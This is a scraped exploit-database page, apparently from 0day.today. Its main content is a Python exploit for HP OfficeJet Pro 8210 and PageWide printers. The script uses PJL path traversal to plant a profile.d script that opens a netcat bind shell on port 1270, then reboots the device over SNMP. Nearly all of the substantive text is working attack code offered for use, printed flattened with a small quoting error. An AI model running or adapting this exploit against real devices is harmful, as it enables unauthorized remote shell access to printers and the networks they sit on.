0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution Exp
Author
Risk
![](/img/risk/critlow_4.gif)
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
## # Create a bind shell on an unpatched OfficeJet 8210 # Write a script to profile.d and reboot the device. When it comes # back online then nc to port 1270. # # easysnmp instructions: # sudo apt-get install libsnmp-dev # pip install easysnmp ## import socket import sys from easysnmp import snmp_set profile_d_script = ('if [ ! -p /tmp/pwned ]; then\n' '\tmkfifo /tmp/pwned\n' '\tcat /tmp/pwned | /bin/sh 2>&1 | /usr/bin/nc -l 1270 > /tmp/pwned &\n 'fi\n') if len(sys.argv) != 3: print '\nUsage:upload.py [ip] [port]\n' sys.exit() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(2) server_address = (sys.argv[1], int(sys.argv[2])) print 'connecting to %s port %s' % server_address sock.connect(server_address) dir_query = '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=' + str(len(profile_d_script)) + ' NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n' dir_query += profile_d_script dir_query += '\x1b%-12345X' sock.sendall(dir_query) sock.close() sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock1.connect(server_address) dir_query = '@PJL FSQUERY NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n' sock1.sendall(dir_query) response = '' while True: data = sock1.recv(1) if '\n' == data: break response += data print response snmp_set('.1.3.6.1.2.1.43.5.1.1.3.1', 4, 'integer', hostname='192.168.1.158', community='public', version=1) print 'Done! Try port 1270 in ~30 seconds' # 0day.today [2024-07-03] #